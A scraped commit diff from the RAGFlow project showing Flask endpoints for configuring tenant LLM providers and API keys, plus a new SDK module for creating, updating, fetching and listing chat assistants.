"api_key": req["api_key"],
|
||||
"api_base": req.get("base_url", "")
|
||||
}
|
||||
for n in ["model_type", "llm_name"]:
|
||||
if n in req:
|
||||
llm[n] = req[n]
|
||||
|
||||
if not TenantLLMService.filter_update(
|
||||
[TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == factory], llm):
|
||||
for llm in LLMService.query(fid=factory):
|
||||
TenantLLMService.save(
|
||||
tenant_id=current_user.id,
|
||||
llm_factory=factory,
|
||||
llm_name=llm.llm_name,
|
||||
model_type=llm.model_type,
|
||||
api_key=req["api_key"],
|
||||
api_base=req.get("base_url", "")
|
||||
)
|
||||
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/add_llm', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("llm_factory", "llm_name", "model_type")
|
||||
def add_llm():
|
||||
req = request.json
|
||||
llm = {
|
||||
"tenant_id": current_user.id,
|
||||
"llm_factory": req["llm_factory"],
|
||||
"model_type": req["model_type"],
|
||||
"llm_name": req["llm_name"],
|
||||
"api_base": req.get("api_base", ""),
|
||||
"api_key": "xxxxxxxxxxxxxxx"
|
||||
}
|
||||
|
||||
factory = req["llm_factory"]
|
||||
msg = ""
|
||||
if llm["model_type"] == LLMType.EMBEDDING.value:
|
||||
mdl = EmbeddingModel[factory](
|
||||
key=None, model_name=llm["llm_name"], base_url=llm["api_base"])
|
||||
try:
|
||||
arr, tc = mdl.encode(["Test if the api key is available"])
|
||||
if len(arr[0]) == 0 or tc == 0:
|
||||
raise Exception("Fail")
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access embedding model({llm['llm_name']})." + str(e)
|
||||
elif llm["model_type"] == LLMType.CHAT.value:
|
||||
mdl = ChatModel[factory](
|
||||
key=None, model_name=llm["llm_name"], base_url=llm["api_base"])
|
||||
try:
|
||||
m, tc = mdl.chat(None, [{"role": "user", "content": "Hello! How are you doing!"}], {
|
||||
"temperature": 0.9})
|
||||
if not tc:
|
||||
raise Exception(m)
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access model({llm['llm_name']})." + str(
|
||||
e)
|
||||
else:
|
||||
# TODO: check other type of models
|
||||
pass
|
||||
|
||||
if msg:
|
||||
return get_data_error_result(retmsg=msg)
|
||||
|
||||
|
||||
if not TenantLLMService.filter_update(
|
||||
[TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == factory, TenantLLM.llm_name == llm["llm_name"]], llm):
|
||||
TenantLLMService.save(**llm)
|
||||
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/delete_llm', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("llm_factory", "llm_name")
|
||||
def delete_llm():
|
||||
req = request.json
|
||||
TenantLLMService.filter_delete(
|
||||
[TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == req["llm_factory"], TenantLLM.llm_name == req["llm_name"]])
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/my_llms', methods=['GET'])
|
||||
@login_required
|
||||
def my_llms():
|
||||
try:
|
||||
res = {}
|
||||
for o in TenantLLMService.get_my_llms(current_user.id):
|
||||
if o["llm_factory"] not in res:
|
||||
res[o["llm_factory"]] = {
|
||||
"tags": o["tags"],
|
||||
"llm": []
|
||||
}
|
||||
res[o["llm_factory"]]["llm"].append({
|
||||
"type": o["model_type"],
|
||||
"name": o["llm_name"],
|
||||
"used_token": o["used_tokens"]
|
||||
})
|
||||
return get_json_result(data=res)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def list_app():
|
||||
model_type = request.args.get("model_type")
|
||||
try:
|
||||
objs = TenantLLMService.query(tenant_id=current_user.id)
|
||||
facts = set([o.to_dict()["llm_factory"] for o in objs if o.api_key])
|
||||
llms = LLMService.get_all()
|
||||
llms = [m.to_dict()
|
||||
for m in llms if m.status == StatusEnum.VALID.value]
|
||||
for m in llms:
|
||||
m["available"] = m["fid"] in facts or m["llm_name"].lower() == "flag-embedding" or m["fid"] in ["Youdao","FastEmbed"]
|
||||
|
||||
llm_set = set([m["llm_name"] for m in llms])
|
||||
for o in objs:
|
||||
if not o.api_key:continue
|
||||
if o.llm_name in llm_set:continue
|
||||
llms.append({"llm_name": o.llm_name, "model_type": o.model_type, "fid": o.llm_factory, "available": True})
|
||||
|
||||
res = {}
|
||||
for m in llms:
|
||||
if model_type and m["model_type"].find(model_type)<0:
|
||||
continue
|
||||
if m["fid"] not in res:
|
||||
res[m["fid"]] = []
|
||||
res[m["fid"]].append(m)
|
||||
|
||||
return get_json_result(data=res)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from flask import request
|
||||
from flask_login import login_required, current_user
|
||||
from api.db.services.llm_service import LLMFactoriesService, TenantLLMService, LLMService
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.db import StatusEnum, LLMType
|
||||
from api.db.db_models import TenantLLM
|
||||
from api.utils.api_utils import get_json_result
|
||||
from rag.llm import EmbeddingModel, ChatModel, RerankModel, CvModel, TTSModel
|
||||
import requests
|
||||
|
||||
|
||||
@manager.route('/factories', methods=['GET'])
|
||||
@login_required
|
||||
def factories():
|
||||
try:
|
||||
fac = LLMFactoriesService.get_all()
|
||||
fac = [f.to_dict() for f in fac if f.name not in ["Youdao", "FastEmbed", "BAAI"]]
|
||||
llms = LLMService.get_all()
|
||||
mdl_types = {}
|
||||
for m in llms:
|
||||
if m.status != StatusEnum.VALID.value:
|
||||
continue
|
||||
if m.fid not in mdl_types:
|
||||
mdl_types[m.fid] = set([])
|
||||
mdl_types[m.fid].add(m.model_type)
|
||||
for f in fac:
|
||||
f["model_types"] = list(mdl_types.get(f["name"], [LLMType.CHAT, LLMType.EMBEDDING, LLMType.RERANK,
|
||||
LLMType.IMAGE2TEXT, LLMType.SPEECH2TEXT, LLMType.TTS]))
|
||||
return get_json_result(data=fac)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/set_api_key', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("llm_factory", "api_key")
|
||||
def set_api_key():
|
||||
req = request.json
|
||||
# test if api key works
|
||||
chat_passed, embd_passed, rerank_passed = False, False, False
|
||||
factory = req["llm_factory"]
|
||||
msg = ""
|
||||
for llm in LLMService.query(fid=factory)[:3]:
|
||||
if not embd_passed and llm.model_type == LLMType.EMBEDDING.value:
|
||||
mdl = EmbeddingModel[factory](
|
||||
req["api_key"], llm.llm_name, base_url=req.get("base_url"))
|
||||
try:
|
||||
arr, tc = mdl.encode(["Test if the api key is available"])
|
||||
if len(arr[0]) == 0:
|
||||
raise Exception("Fail")
|
||||
embd_passed = True
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access embedding model({llm.llm_name}) using this api key." + str(e)
|
||||
elif not chat_passed and llm.model_type == LLMType.CHAT.value:
|
||||
mdl = ChatModel[factory](
|
||||
req["api_key"], llm.llm_name, base_url=req.get("base_url"))
|
||||
try:
|
||||
m, tc = mdl.chat(None, [{"role": "user", "content": "Hello! How are you doing!"}],
|
||||
{"temperature": 0.9,'max_tokens':50})
|
||||
if m.find("**ERROR**") >=0:
|
||||
raise Exception(m)
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access model({llm.llm_name}) using this api key." + str(
|
||||
e)
|
||||
chat_passed = True
|
||||
elif not rerank_passed and llm.model_type == LLMType.RERANK:
|
||||
mdl = RerankModel[factory](
|
||||
req["api_key"], llm.llm_name, base_url=req.get("base_url"))
|
||||
try:
|
||||
arr, tc = mdl.similarity("What's the weather?", ["Is it sunny today?"])
|
||||
if len(arr) == 0 or tc == 0:
|
||||
raise Exception("Fail")
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access model({llm.llm_name}) using this api key." + str(
|
||||
e)
|
||||
rerank_passed = True
|
||||
|
||||
if msg:
|
||||
return get_data_error_result(retmsg=msg)
|
||||
|
||||
llm = {
|
||||
"api_key": req["api_key"],
|
||||
"api_base": req.get("base_url", "")
|
||||
}
|
||||
for n in ["model_type", "llm_name"]:
|
||||
if n in req:
|
||||
llm[n] = req[n]
|
||||
|
||||
if not TenantLLMService.filter_update(
|
||||
[TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == factory], llm):
|
||||
for llm in LLMService.query(fid=factory):
|
||||
TenantLLMService.save(
|
||||
tenant_id=current_user.id,
|
||||
llm_factory=factory,
|
||||
llm_name=llm.llm_name,
|
||||
model_type=llm.model_type,
|
||||
api_key=req["api_key"],
|
||||
api_base=req.get("base_url", "")
|
||||
)
|
||||
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/add_llm', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("llm_factory")
|
||||
def add_llm():
|
||||
req = request.json
|
||||
factory = req["llm_factory"]
|
||||
|
||||
if factory == "VolcEngine":
|
||||
# For VolcEngine, due to its special authentication method
|
||||
# Assemble ark_api_key endpoint_id into api_key
|
||||
llm_name = req["llm_name"]
|
||||
api_key = '{' + f'"ark_api_key": "{req.get("ark_api_key", "")}", ' \
|
||||
f'"ep_id": "{req.get("endpoint_id", "")}", ' + '}'
|
||||
elif factory == "Tencent Hunyuan":
|
||||
api_key = '{' + f'"hunyuan_sid": "{req.get("hunyuan_sid", "")}", ' \
|
||||
f'"hunyuan_sk": "{req.get("hunyuan_sk", "")}"' + '}'
|
||||
req["api_key"] = api_key
|
||||
return set_api_key()
|
||||
elif factory == "Tencent Cloud":
|
||||
api_key = '{' + f'"tencent_cloud_sid": "{req.get("tencent_cloud_sid", "")}", ' \
|
||||
f'"tencent_cloud_sk": "{req.get("tencent_cloud_sk", "")}"' + '}'
|
||||
req["api_key"] = api_key
|
||||
elif factory == "Bedrock":
|
||||
# For Bedrock, due to its special authentication method
|
||||
# Assemble bedrock_ak, bedrock_sk, bedrock_region
|
||||
llm_name = req["llm_name"]
|
||||
api_key = '{' + f'"bedrock_ak": "{req.get("bedrock_ak", "")}", ' \
|
||||
f'"bedrock_sk": "{req.get("bedrock_sk", "")}", ' \
|
||||
f'"bedrock_region": "{req.get("bedrock_region", "")}", ' + '}'
|
||||
elif factory == "LocalAI":
|
||||
llm_name = req["llm_name"]+"___LocalAI"
|
||||
api_key = "xxxxxxxxxxxxxxx"
|
||||
elif factory == "OpenAI-API-Compatible":
|
||||
llm_name = req["llm_name"]+"___OpenAI-API"
|
||||
api_key = req.get("api_key","xxxxxxxxxxxxxxx")
|
||||
elif factory =="XunFei Spark":
|
||||
llm_name = req["llm_name"]
|
||||
api_key = req.get("spark_api_password","xxxxxxxxxxxxxxx")
|
||||
elif factory == "BaiduYiyan":
|
||||
llm_name = req["llm_name"]
|
||||
api_key = '{' + f'"yiyan_ak": "{req.get("yiyan_ak", "")}", ' \
|
||||
f'"yiyan_sk": "{req.get("yiyan_sk", "")}"' + '}'
|
||||
elif factory == "Fish Audio":
|
||||
llm_name = req["llm_name"]
|
||||
api_key = '{' + f'"fish_audio_ak": "{req.get("fish_audio_ak", "")}", ' \
|
||||
f'"fish_audio_refid": "{req.get("fish_audio_refid", "59cb5986671546eaa6ca8ae6f29f6d22")}"' + '}'
|
||||
elif factory == "Google Cloud":
|
||||
llm_name = req["llm_name"]
|
||||
api_key = (
|
||||
"{" + f'"google_project_id": "{req.get("google_project_id", "")}", '
|
||||
f'"google_region": "{req.get("google_region", "")}", '
|
||||
f'"google_service_account_key": "{req.get("google_service_account_key", "")}"'
|
||||
+ "}"
|
||||
)
|
||||
else:
|
||||
llm_name = req["llm_name"]
|
||||
api_key = req.get("api_key","xxxxxxxxxxxxxxx")
|
||||
|
||||
llm = {
|
||||
"tenant_id": current_user.id,
|
||||
"llm_factory": factory,
|
||||
"model_type": req["model_type"],
|
||||
"llm_name": llm_name,
|
||||
"api_base": req.get("api_base", ""),
|
||||
"api_key": api_key
|
||||
}
|
||||
|
||||
msg = ""
|
||||
if llm["model_type"] == LLMType.EMBEDDING.value:
|
||||
mdl = EmbeddingModel[factory](
|
||||
key=llm['api_key'],
|
||||
model_name=llm["llm_name"],
|
||||
base_url=llm["api_base"])
|
||||
try:
|
||||
arr, tc = mdl.encode(["Test if the api key is available"])
|
||||
if len(arr[0]) == 0 or tc == 0:
|
||||
raise Exception("Fail")
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access embedding model({llm['llm_name']})." + str(e)
|
||||
elif llm["model_type"] == LLMType.CHAT.value:
|
||||
mdl = ChatModel[factory](
|
||||
key=llm['api_key'],
|
||||
model_name=llm["llm_name"],
|
||||
base_url=llm["api_base"]
|
||||
)
|
||||
try:
|
||||
m, tc = mdl.chat(None, [{"role": "user", "content": "Hello! How are you doing!"}], {
|
||||
"temperature": 0.9})
|
||||
if not tc:
|
||||
raise Exception(m)
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access model({llm['llm_name']})." + str(
|
||||
e)
|
||||
elif llm["model_type"] == LLMType.RERANK:
|
||||
mdl = RerankModel[factory](
|
||||
key=llm["api_key"],
|
||||
model_name=llm["llm_name"],
|
||||
base_url=llm["api_base"]
|
||||
)
|
||||
try:
|
||||
arr, tc = mdl.similarity("Hello~ Ragflower!", ["Hi, there!"])
|
||||
if len(arr) == 0 or tc == 0:
|
||||
raise Exception("Not known.")
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access model({llm['llm_name']})." + str(
|
||||
e)
|
||||
elif llm["model_type"] == LLMType.IMAGE2TEXT.value:
|
||||
mdl = CvModel[factory](
|
||||
key=llm["api_key"],
|
||||
model_name=llm["llm_name"],
|
||||
base_url=llm["api_base"]
|
||||
)
|
||||
try:
|
||||
img_url = (
|
||||
"https://upload.wikimedia.org/wikipedia/comm"
|
||||
"ons/thumb/d/dd/Gfp-wisconsin-madison-the-nature-boardwalk.jpg/256"
|
||||
"0px-Gfp-wisconsin-madison-the-nature-boardwalk.jpg"
|
||||
)
|
||||
res = requests.get(img_url)
|
||||
if res.status_code == 200:
|
||||
m, tc = mdl.describe(res.content)
|
||||
if not tc:
|
||||
raise Exception(m)
|
||||
else:
|
||||
pass
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access model({llm['llm_name']})." + str(e)
|
||||
elif llm["model_type"] == LLMType.TTS:
|
||||
mdl = TTSModel[factory](
|
||||
key=llm["api_key"], model_name=llm["llm_name"], base_url=llm["api_base"]
|
||||
)
|
||||
try:
|
||||
for resp in mdl.tts("Hello~ Ragflower!"):
|
||||
pass
|
||||
except RuntimeError as e:
|
||||
msg += f"\nFail to access model({llm['llm_name']})." + str(e)
|
||||
else:
|
||||
# TODO: check other type of models
|
||||
pass
|
||||
|
||||
if msg:
|
||||
return get_data_error_result(retmsg=msg)
|
||||
|
||||
if not TenantLLMService.filter_update(
|
||||
[TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == factory, TenantLLM.llm_name == llm["llm_name"]], llm):
|
||||
TenantLLMService.save(**llm)
|
||||
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/delete_llm', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("llm_factory", "llm_name")
|
||||
def delete_llm():
|
||||
req = request.json
|
||||
TenantLLMService.filter_delete(
|
||||
[TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == req["llm_factory"], TenantLLM.llm_name == req["llm_name"]])
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/my_llms', methods=['GET'])
|
||||
@login_required
|
||||
def my_llms():
|
||||
try:
|
||||
res = {}
|
||||
for o in TenantLLMService.get_my_llms(current_user.id):
|
||||
if o["llm_factory"] not in res:
|
||||
res[o["llm_factory"]] = {
|
||||
"tags": o["tags"],
|
||||
"llm": []
|
||||
}
|
||||
res[o["llm_factory"]]["llm"].append({
|
||||
"type": o["model_type"],
|
||||
"name": o["llm_name"],
|
||||
"used_token": o["used_tokens"]
|
||||
})
|
||||
return get_json_result(data=res)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def list_app():
|
||||
model_type = request.args.get("model_type")
|
||||
try:
|
||||
objs = TenantLLMService.query(tenant_id=current_user.id)
|
||||
facts = set([o.to_dict()["llm_factory"] for o in objs if o.api_key])
|
||||
llms = LLMService.get_all()
|
||||
llms = [m.to_dict()
|
||||
for m in llms if m.status == StatusEnum.VALID.value]
|
||||
for m in llms:
|
||||
m["available"] = m["fid"] in facts or m["llm_name"].lower() == "flag-embedding" or m["fid"] in ["Youdao","FastEmbed", "BAAI"]
|
||||
|
||||
llm_set = set([m["llm_name"] for m in llms])
|
||||
for o in objs:
|
||||
if not o.api_key:continue
|
||||
if o.llm_name in llm_set:continue
|
||||
llms.append({"llm_name": o.llm_name, "model_type": o.model_type, "fid": o.llm_factory, "available": True})
|
||||
|
||||
res = {}
|
||||
for m in llms:
|
||||
if model_type and m["model_type"].find(model_type)<0:
|
||||
continue
|
||||
if m["fid"] not in res:
|
||||
res[m["fid"]] = []
|
||||
res[m["fid"]].append(m)
|
||||
|
||||
return get_json_result(data=res)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
304
api/apps/sdk/assistant.py
Normal file
304
api/apps/sdk/assistant.py
Normal file
@ -0,0 +1,304 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from flask import request
|
||||
|
||||
from api.db import StatusEnum
|
||||
from api.db.db_models import TenantLLM
|
||||
from api.db.services.dialog_service import DialogService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMService, TenantLLMService
|
||||
from api.db.services.user_service import TenantService
|
||||
from api.settings import RetCode
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import get_data_error_result, token_required
|
||||
from api.utils.api_utils import get_json_result
|
||||
|
||||
|
||||
@manager.route('/save', methods=['POST'])
|
||||
@token_required
|
||||
def save(tenant_id):
|
||||
req = request.json
|
||||
# dataset
|
||||
if req.get("knowledgebases") == []:
|
||||
return get_data_error_result(retmsg="knowledgebases can not be empty list")
|
||||
kb_list = []
|
||||
if req.get("knowledgebases"):
|
||||
for kb in req.get("knowledgebases"):
|
||||
if not kb["id"]:
|
||||
return get_data_error_result(retmsg="knowledgebase needs id")
|
||||
if not KnowledgebaseService.query(id=kb["id"], tenant_id=tenant_id):
|
||||
return get_data_error_result(retmsg="you do not own the knowledgebase")
|
||||
# if not DocumentService.query(kb_id=kb["id"]):
|
||||
# return get_data_error_result(retmsg="There is a invalid knowledgebase")
|
||||
kb_list.append(kb["id"])
|
||||
req["kb_ids"] = kb_list
|
||||
# llm
|
||||
llm = req.get("llm")
|
||||
if llm:
|
||||
if "model_name" in llm:
|
||||
req["llm_id"] = llm.pop("model_name")
|
||||
req["llm_setting"] = req.pop("llm")
|
||||
e, tenant = TenantService.get_by_id(tenant_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
# prompt
|
||||
prompt = req.get("prompt")
|
||||
key_mapping = {"parameters": "variables",
|
||||
"prologue": "opener",
|
||||
"quote": "show_quote",
|
||||
"system": "prompt",
|
||||
"rerank_id": "rerank_model",
|
||||
"vector_similarity_weight": "keywords_similarity_weight"}
|
||||
key_list = ["similarity_threshold", "vector_similarity_weight", "top_n", "rerank_id"]
|
||||
if prompt:
|
||||
for new_key, old_key in key_mapping.items():
|
||||
if old_key in prompt:
|
||||
prompt[new_key] = prompt.pop(old_key)
|
||||
for key in key_list:
|
||||
if key in prompt:
|
||||
req[key] = prompt.pop(key)
|
||||
req["prompt_config"] = req.pop("prompt")
|
||||
# create
|
||||
if "id" not in req:
|
||||
# dataset
|
||||
if not kb_list:
|
||||
return get_data_error_result(retmsg="knowledgebases are required!")
|
||||
# init
|
||||
req["id"] = get_uuid()
|
||||
req["description"] = req.get("description", "A helpful Assistant")
|
||||
req["icon"] = req.get("avatar", "")
|
||||
req["top_n"] = req.get("top_n", 6)
|
||||
req["top_k"] = req.get("top_k", 1024)
|
||||
req["rerank_id"] = req.get("rerank_id", "")
|
||||
if req.get("llm_id"):
|
||||
if not TenantLLMService.query(llm_name=req["llm_id"]):
|
||||
return get_data_error_result(retmsg="the model_name does not exist.")
|
||||
else:
|
||||
req["llm_id"] = tenant.llm_id
|
||||
if not req.get("name"):
|
||||
return get_data_error_result(retmsg="name is required.")
|
||||
if DialogService.query(name=req["name"], tenant_id=tenant_id, status=StatusEnum.VALID.value):
|
||||
return get_data_error_result(retmsg="Duplicated assistant name in creating dataset.")
|
||||
# tenant_id
|
||||
if req.get("tenant_id"):
|
||||
return get_data_error_result(retmsg="tenant_id must not be provided.")
|
||||
req["tenant_id"] = tenant_id
|
||||
# prompt more parameter
|
||||
default_prompt = {
|
||||
"system": """你是一个智能助手,请总结知识库的内容来回答问题,请列举知识库中的数据详细回答。当所有知识库内容都与问题无关时,你的回答必须包括“知识库中未找到您要的答案!”这句话。回答需要考虑聊天历史。
|
||||
以下是知识库:
|
||||
{knowledge}
|
||||
以上是知识库。""",
|
||||
"prologue": "您好,我是您的助手小樱,长得可爱又善良,can I help you?",
|
||||
"parameters": [
|
||||
{"key": "knowledge", "optional": False}
|
||||
],
|
||||
"empty_response": "Sorry! 知识库中未找到相关内容!"
|
||||
}
|
||||
key_list_2 = ["system", "prologue", "parameters", "empty_response"]
|
||||
if "prompt_config" not in req:
|
||||
req['prompt_config'] = {}
|
||||
for key in key_list_2:
|
||||
temp = req['prompt_config'].get(key)
|
||||
if not temp:
|
||||
req['prompt_config'][key] = default_prompt[key]
|
||||
for p in req['prompt_config']["parameters"]:
|
||||
if p["optional"]:
|
||||
continue
|
||||
if req['prompt_config']["system"].find("{%s}" % p["key"]) < 0:
|
||||
return get_data_error_result(
|
||||
retmsg="Parameter '{}' is not used".format(p["key"]))
|
||||
# save
|
||||
if not DialogService.save(**req):
|
||||
return get_data_error_result(retmsg="Fail to new an assistant!")
|
||||
# response
|
||||
e, res = DialogService.get_by_id(req["id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Fail to new an assistant!")
|
||||
res = res.to_json()
|
||||
renamed_dict = {}
|
||||
for key, value in res["prompt_config"].items():
|
||||
new_key = key_mapping.get(key, key)
|
||||
renamed_dict[new_key] = value
|
||||
res["prompt"] = renamed_dict
|
||||
del res["prompt_config"]
|
||||
new_dict = {"similarity_threshold": res["similarity_threshold"],
|
||||
"keywords_similarity_weight": res["vector_similarity_weight"],
|
||||
"top_n": res["top_n"],
|
||||
"rerank_model": res['rerank_id']}
|
||||
res["prompt"].update(new_dict)
|
||||
for key in key_list:
|
||||
del res[key]
|
||||
res["llm"] = res.pop("llm_setting")
|
||||
res["llm"]["model_name"] = res.pop("llm_id")
|
||||
del res["kb_ids"]
|
||||
res["knowledgebases"] = req["knowledgebases"]
|
||||
res["avatar"] = res.pop("icon")
|
||||
return get_json_result(data=res)
|
||||
else:
|
||||
# authorization
|
||||
if not DialogService.query(tenant_id=tenant_id, id=req["id"], status=StatusEnum.VALID.value):
|
||||
return get_json_result(data=False, retmsg='You do not own the assistant', retcode=RetCode.OPERATING_ERROR)
|
||||
# prompt
|
||||
if not req["id"]:
|
||||
return get_data_error_result(retmsg="id can not be empty")
|
||||
e, res = DialogService.get_by_id(req["id"])
|
||||
res = res.to_json()
|
||||
if "llm_id" in req:
|
||||
if not TenantLLMService.query(llm_name=req["llm_id"]):
|
||||
return get_data_error_result(retmsg="the model_name does not exist.")
|
||||
if "name" in req:
|
||||
if not req.get("name"):
|
||||
return get_data_error_result(retmsg="name is not empty.")
|
||||
if req["name"].lower() != res["name"].lower() \
|
||||
and len(
|
||||
DialogService.query(name=req["name"], tenant_id=tenant_id, status=StatusEnum.VALID.value)) > 0:
|
||||
return get_data_error_result(retmsg="Duplicated assistant name in updating dataset.")
|
||||
if "prompt_config" in req:
|
||||
res["prompt_config"].update(req["prompt_config"])
|
||||
for p in res["prompt_config"]["parameters"]:
|
||||
if p["optional"]:
|
||||
continue
|
||||
if res["prompt_config"]["system"].find("{%s}" % p["key"]) < 0:
|
||||
return get_data_error_result(retmsg="Parameter '{}' is not used".format(p["key"]))
|
||||
if "llm_setting" in req:
|
||||
res["llm_setting"].update(req["llm_setting"])
|
||||
req["prompt_config"] = res["prompt_config"]
|
||||
req["llm_setting"] = res["llm_setting"]
|
||||
# avatar
|
||||
if "avatar" in req:
|
||||
req["icon"] = req.pop("avatar")
|
||||
assistant_id = req.pop("id")
|
||||
if "knowledgebases" in req:
|
||||
req.pop("knowledgebases")
|
||||
if not DialogService.update_by_id(assistant_id, req):
|
||||
return get_data_error_result(retmsg="Assistant not found!")
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/delete', methods=['DELETE'])
|
||||
@token_required
|
||||
def delete(tenant_id):
|
||||
req = request.args
|
||||
if "id" not in req:
|
||||
return get_data_error_result(retmsg="id is required")
|
||||
id = req['id']
|
||||
if not DialogService.query(tenant_id=tenant_id, id=id, status=StatusEnum.VALID.value):
|
||||
return get_json_result(data=False, retmsg='you do not own the assistant.', retcode=RetCode.OPERATING_ERROR)
|
||||
|
||||
temp_dict = {"status": StatusEnum.INVALID.value}
|
||||
DialogService.update_by_id(req["id"], temp_dict)
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/get', methods=['GET'])
|
||||
@token_required
|
||||
def get(tenant_id):
|
||||
req = request.args
|
||||
if "id" in req:
|
||||
id = req["id"]
|
||||
ass = DialogService.query(tenant_id=tenant_id, id=id, status=StatusEnum.VALID.value)
|
||||
if not ass:
|
||||
return get_json_result(data=False, retmsg='You do not own the assistant.', retcode=RetCode.OPERATING_ERROR)
|
||||
if "name" in req:
|
||||
name = req["name"]
|
||||
if ass[0].name != name:
|
||||
return get_json_result(data=False, retmsg='name does not match id.', retcode=RetCode.OPERATING_ERROR)
|
||||
res = ass[0].to_json()
|
||||
else:
|
||||
if "name" in req:
|
||||
name = req["name"]
|
||||
ass = DialogService.query(name=name, tenant_id=tenant_id, status=StatusEnum.VALID.value)
|
||||
if not ass:
|
||||
return get_json_result(data=False, retmsg='You do not own the assistant.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
res = ass[0].to_json()
|
||||
else:
|
||||
return get_data_error_result(retmsg="At least one of `id` or `name` must be provided.")
|
||||
renamed_dict = {}
|
||||
key_mapping = {"parameters": "variables",
|
||||
"prologue": "opener",
|
||||
"quote": "show_quote",
|
||||
"system": "prompt",
|
||||
"rerank_id": "rerank_model",
|
||||
"vector_similarity_weight": "keywords_similarity_weight"}
|
||||
key_list = ["similarity_threshold", "vector_similarity_weight", "top_n", "rerank_id"]
|
||||
for key, value in res["prompt_config"].items():
|
||||
new_key = key_mapping.get(key, key)
|
||||
renamed_dict[new_key] = value
|
||||
res["prompt"] = renamed_dict
|
||||
del res["prompt_config"]
|
||||
new_dict = {"similarity_threshold": res["similarity_threshold"],
|
||||
"keywords_similarity_weight": res["vector_similarity_weight"],
|
||||
"top_n": res["top_n"],
|
||||
"rerank_model": res['rerank_id']}
|
||||
res["prompt"].update(new_dict)
|
||||
for key in key_list:
|
||||
del res[key]
|
||||
res["llm"] = res.pop("llm_setting")
|
||||
res["llm"]["model_name"] = res.pop("llm_id")
|
||||
kb_list = []
|
||||
for kb_id in res["kb_ids"]:
|
||||
kb = KnowledgebaseService.query(id=kb_id)
|
||||
kb_list.append(kb[0].to_json())
|
||||
del res["kb_ids"]
|
||||
res["knowledgebases"] = kb_list
|
||||
res["avatar"] = res.pop("icon")
|
||||
return get_json_result(data=res)
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@token_required
|
||||
def list_assistants(tenant_id):
|
||||
assts = DialogService.query(
|
||||
tenant_id=tenant_id,
|
||||
status=StatusEnum.VALID.value,
|
||||
reverse=True,
|
||||
order_by=DialogService.model.create_time)
|
||||
assts = [d.to_dict() for d in assts]
|
||||
list_assts = []
|
||||
renamed_dict = {}
|
||||
key_mapping = {"parameters": "variables",
|
||||
"prologue": "opener",
|
||||
"quote": "show_quote",
|
||||
"system": "prompt",
|
||||
"rerank_id": "rerank_model",
|
||||
"vector_similarity_weight": "keywords_similarity_weight"}
|
||||
key_list = ["similarity_threshold", "vector_similarity_weight", "top_n", "rerank_id"]
|
||||
for res in assts:
|
||||
for key, value in res["prompt_config"].items():
|
||||
new_key = key_mapping.get(key, key)
|
||||
renamed_dict[new_key] = value
|
||||
res["prompt"] = renamed_dict
|
||||
del res["prompt_config"]
|
